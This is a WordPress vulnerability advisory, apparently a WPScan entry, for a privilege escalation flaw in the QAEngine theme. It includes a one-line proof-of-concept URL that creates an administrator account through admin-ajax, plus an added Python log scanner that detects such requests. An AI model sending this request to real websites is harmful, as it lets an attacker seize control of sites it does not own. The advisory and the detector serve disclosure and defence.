QAEngine Theme - Privilege Escalation



Description
A vulnerability in the QAEngine theme allows an attacker to create an administrator account on the target website.
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator
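
A detection sketch for the request shape shown above, added here as an example and not part of the original advisory or the theme's code: it scans web server access logs for `ae-sync-user` create calls that carry a client-supplied `role` parameter. The function name, the combined log format, and the sample lines are assumptions constructed for illustration; parameters sent in a POST body do not appear in access logs and are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [06/Apr/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator HTTP/1.1" 200 512 "-" "curl/7.40"
203.0.113.9 - - [06/Apr/2015:10:02:11 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Apr/2015:10:03:40 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=bob&role=Administrator%20 HTTP/1.1" 200 512 "-" "curl/7.40"
203.0.113.20 - - [06/Apr/2015:10:05:00 +0000] "GET /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=carol&user_pass=pw HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# client IP, HTTP method, request target from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def find_role_injection(log_text):
    """Return one dict per ae-sync-user create request that supplies a role."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _http_method, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes values; normalise case and whitespace so
        # variants such as "Administrator%20" are still matched.
        query = parse_qs(url.query, keep_blank_values=True)

        def values(key):
            return [v.strip().lower() for v in query.get(key, [])]

        if ("ae-sync-user" in values("action")
                and "create" in values("method")
                and query.get("role")):
            hits.append({
                "ip": ip,
                "user_login": query.get("user_login", [""])[0],
                "role": values("role")[0],
            })
    return hits


if __name__ == "__main__":
    for hit in find_role_injection(SAMPLE_LOG):
        print(hit)
```

Any hit should be cross-checked against the site's user list for accounts created at the logged time.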

Affects Theme

References

PACKETSTORM 131648
URL http://web.archive.org/web/20150912144515/http://research.evex.pw/?vuln=10

Classification

Type BYPASS

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 1059
Verified No
WPVDB ID 7885

Timeline

Publicly Published 2015-04-06 (over 3 years ago)
Added 2015-04-07 (over 3 years ago)
Last Updated 2016-04-24 (over 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.